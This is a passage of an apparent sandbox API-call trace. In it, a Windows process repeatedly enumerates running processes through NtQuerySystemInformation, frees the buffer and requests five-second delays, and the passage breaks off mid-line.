[0156.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.145] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.160] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.176] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.197] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.207] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.222] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.254] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.269] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.284] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.332] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.347] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.363] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.379] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.395] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.456] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 